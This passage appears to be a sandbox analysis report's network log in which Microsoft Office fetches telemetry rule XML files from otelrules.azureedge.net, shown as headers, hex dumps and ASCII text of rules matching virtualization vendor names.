                                                                                                                                                                                  2024-11-23 18:52:46 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  58192.168.2.74976413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:46 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:46 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 419
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                  x-ms-request-id: 7fefabc9-101e-000b-0f11-3d5e5c000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185246Z-178bfbc474bv587zhC1NYCny5w00000004t0000000006774
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:47 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  59192.168.2.74976513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:46 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:47 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 477
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                  x-ms-request-id: 38a668eb-401e-00ac-34a1-3b0a97000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185247Z-15b8b599d885ffrhhC1TEBtuv000000003e0000000006ddh
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:47 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  60192.168.2.74976613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:47 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:48 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 419
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                  x-ms-request-id: 6b91e280-c01e-00a2-4f0a-3d2327000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185248Z-178bfbc474bw8bwphC1NYC38b400000004mg00000000h3h3
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:48 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  61192.168.2.74976713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:47 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:48 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 477
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                  x-ms-request-id: 907655e5-001e-0065-594b-3c0b73000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185248Z-178bfbc474bnwsh4hC1NYC2ubs00000004y000000000b20t
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:48 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  62192.168.2.74976813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:48 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:48 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 419
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                  x-ms-request-id: a7625850-801e-007b-654c-3ce7ab000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185248Z-15b8b599d885v8r9hC1TEB104g00000003eg000000003fst
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:48 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  63192.168.2.74976913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:49 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:49 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 472
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                  x-ms-request-id: 0a397e49-e01e-0051-357f-3b84b2000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185249Z-174c587ffdfb74xqhC1TEBhabc00000003d0000000003pze
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:49 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  64192.168.2.74977013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:49 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:49 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                  x-ms-request-id: ea05e59b-301e-0033-4bf7-3cfa9c000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185249Z-178bfbc474bh5zbqhC1NYCkdug00000004wg000000001cab
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:49 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  65192.168.2.74977213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:50 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:50 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 411
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582B989AF051"
                                                                                                                                                                                  x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185250Z-178bfbc474bnwsh4hC1NYC2ubs00000004y000000000b25n
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:50 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  66192.168.2.74977113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:50 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:50 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 485
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB9769355"
                                                                                                                                                                                  x-ms-request-id: 9a1c1dfd-501e-000a-5c30-3c0180000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185250Z-178bfbc474bpscmfhC1NYCfc2c00000003d000000000e44v
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:50 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  67192.168.2.74977313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:50 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:51 UTC470INHTTP/1.1 200 OK
